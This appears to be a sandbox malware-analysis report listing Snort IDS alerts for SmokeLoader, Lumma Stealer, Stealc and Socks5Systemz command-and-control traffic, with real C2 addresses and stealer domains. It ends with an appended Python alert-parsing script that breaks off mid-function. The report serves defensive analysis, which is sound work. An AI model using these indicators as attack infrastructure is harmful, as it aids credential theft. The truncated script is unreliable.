                  Compliance

                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe | Unpacked PE file: 27.2.anyburnfree.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Unpacked PE file: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack
                  Source: ccQGH1mKws.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: unknown | HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.9:49713 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 172.67.152.52:443 -> 192.168.2.9:49716 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 91.213.233.138:443 -> 192.168.2.9:49715 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 172.67.213.168:443 -> 192.168.2.9:49718 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 172.67.199.120:443 -> 192.168.2.9:49720 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.83.220:443 -> 192.168.2.9:49723 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.83.220:443 -> 192.168.2.9:49724 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 131.188.40.189:443 -> 192.168.2.9:49742 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 103.20.213.70:443 -> 192.168.2.9:49759 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 86.59.21.38:443 -> 192.168.2.9:49786 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 185.227.75.176:443 -> 192.168.2.9:49817 version: TLS 1.2

                  Networking

                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49710 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2050567 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (gemcreedarticulateod .shop) 192.168.2.9:63216 -> 1.1.1.1:53
                  Source: TrafficSnort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.9:49714 -> 104.21.45.242:80
                  Source: TrafficSnort IDS: 2050574 ET TROJAN Observed Lumma Stealer Related Domain (gemcreedarticulateod .shop in TLS SNI) 192.168.2.9:49716 -> 172.67.152.52:443
                  Source: TrafficSnort IDS: 2050564 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (secretionsuitcasenioise .shop) 192.168.2.9:52640 -> 1.1.1.1:53
                  Source: TrafficSnort IDS: 2050577 ET TROJAN Observed Lumma Stealer Related Domain (secretionsuitcasenioise .shop in TLS SNI) 192.168.2.9:49718 -> 172.67.213.168:443
                  Source: TrafficSnort IDS: 2050565 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (claimconcessionrebe .shop) 192.168.2.9:53481 -> 1.1.1.1:53
                  Source: TrafficSnort IDS: 2050572 ET TROJAN Observed Lumma Stealer Related Domain (claimconcessionrebe .shop in TLS SNI) 192.168.2.9:49720 -> 172.67.199.120:443
                  Source: TrafficSnort IDS: 2050566 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (liabilityarrangemenyit .shop) 192.168.2.9:50164 -> 1.1.1.1:53
                  Source: TrafficSnort IDS: 2050578 ET TROJAN Observed Lumma Stealer Related Domain (liabilityarrangemenyit .shop in TLS SNI) 192.168.2.9:49723 -> 104.21.83.220:443
                  Source: TrafficSnort IDS: 2050578 ET TROJAN Observed Lumma Stealer Related Domain (liabilityarrangemenyit .shop in TLS SNI) 192.168.2.9:49724 -> 104.21.83.220:443
                  Source: TrafficSnort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.9:49731 -> 185.172.128.90:80
                  Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.9:49735 -> 185.172.128.79:80
                  Source: TrafficSnort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.9:49735 -> 185.172.128.79:80
                  Source: TrafficSnort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.9:49735 -> 185.172.128.79:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49744 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49747 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49752 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49753 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49756 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49757 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49758 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49760 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49761 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49764 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49765 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49766 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49767 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49769 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49771 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49773 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49774 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49775 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49776 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49777 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49778 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49779 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49780 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49781 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49782 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49783 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49784 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49787 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49788 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49789 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49790 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49791 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49792 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49793 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49796 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49797 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49798 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49799 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49800 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49801 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49802 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49803 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49805 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49806 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49807 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49808 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49809 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49811 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49810 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49812 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49813 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49814 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49815 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49816 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49819 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49820 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49821 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49822 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49824 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49823 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49825 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49826 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49827 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49828 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49829 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49830 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49831 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49832 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49833 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49834 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49835 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49836 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49837 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49838 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49839 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49840 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49841 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49842 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49843 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49844 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49845 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49847 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49848 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49849 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49850 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49851 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49852 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49853 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49854 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49855 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49856 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49857 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49858 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49859 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49860 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49861 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49862 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49863 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49864 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49865 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49866 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49867 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49868 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49869 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49870 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49872 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49874 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49875 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49876 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49877 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49878 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49879 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49880 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49881 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49882 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49883 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49884 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49885 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49886 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49887 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49888 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49889 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49890 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49891 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49893 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49892 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49894 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49896 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49897 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49899 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49900 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49901 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49903 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49904 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49905 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:50341 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:55644 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:57197 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:58448 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:59303 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:60102 -> 185.196.8.22:80
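The Snort block above mixes four families (SmokeLoader beacons to 91.215.85.120 and 189.232.12.90, Lumma DNS and TLS-SNI hits, Stealc check-ins to 185.172.128.79, and a long Socks5Systemz run to 185.196.8.22), and most of what an analyst needs is the per-family set of destinations and rule SIDs rather than the raw line count. The following is an added example (not Joe Sandbox code) that reduces signature lines of this shape to that summary; the sample lines are copied from this section and embedded as a constructed input, `FAMILY_HINTS` is this example's own mapping of rule-message keywords to families, and the resolver address 1.1.1.1:53 is excluded from the endpoint list because DNS-lookup rules fire on the sandbox's resolver, not on C2.

```python
"""Reduce Joe Sandbox 'Snort IDS' signature lines to per-family IOC sets."""
import re
from collections import defaultdict

# Constructed input: lines copied from this report's Networking section. In the
# raw export the source column runs into the detector column ("TrafficSnort IDS"),
# so the parser only anchors on "Snort IDS:" and tolerates either spelling.
SAMPLE = """\
Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49710 -> 91.215.85.120:80
Source: Traffic | Snort IDS: 2050567 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (gemcreedarticulateod .shop) 192.168.2.9:63216 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2050574 ET TROJAN Observed Lumma Stealer Related Domain (gemcreedarticulateod .shop in TLS SNI) 192.168.2.9:49716 -> 172.67.152.52:443
Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.9:49735 -> 185.172.128.79:80
Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49767 -> 185.196.8.22:80
Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49769 -> 185.196.8.22:80
Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49744 -> 189.232.12.90:80
"""

ALERT_RE = re.compile(
    r"Snort IDS:\s*(?P<sid>\d+)\s+(?P<msg>.+?)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*(?P<dst>[\d.]+):(?P<dport>\d+)\s*$"
)
# ET rule messages print looked-up domains as "name .tld" to keep them unclickable.
DOMAIN_RE = re.compile(r"\(([\w.-]+) \.(\w+)(?: in TLS SNI)?\)")
# Keyword-to-family mapping assumed for this example; first match wins.
FAMILY_HINTS = ("Smokeloader", "Lumma", "Stealc", "Socks5Systemz")
RESOLVER_PORT = 53


def parse_alerts(text):
    """Return one dict per Snort line: sid, msg, src, sport, dst, dport, family."""
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.search(line)
        if not m:
            continue
        a = m.groupdict()
        a["sid"] = int(a["sid"])
        a["sport"], a["dport"] = int(a["sport"]), int(a["dport"])
        low = a["msg"].lower()
        a["family"] = next((f for f in FAMILY_HINTS if f.lower() in low), "unknown")
        alerts.append(a)
    return alerts


def refang_domain(msg):
    """Rejoin the defanged domain in a rule message, or None if there is none."""
    m = DOMAIN_RE.search(msg)
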